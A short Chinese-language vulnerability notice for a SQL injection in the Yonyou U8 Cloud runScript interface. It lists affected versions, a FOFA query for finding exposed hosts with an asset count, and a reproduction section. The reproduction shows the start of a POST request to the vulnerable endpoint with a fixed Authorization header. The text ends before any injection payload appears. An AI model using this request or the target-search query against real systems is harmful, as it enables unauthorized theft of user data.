产品简介
用友cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。
漏洞描述
用友cloud runscript接口处存在sql注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
fofa及漏洞编号
app=”用友-U8-Cloud”
影响资产数量:5408
影响版本
2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp
漏洞复现
POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en
Authorization: 58e0046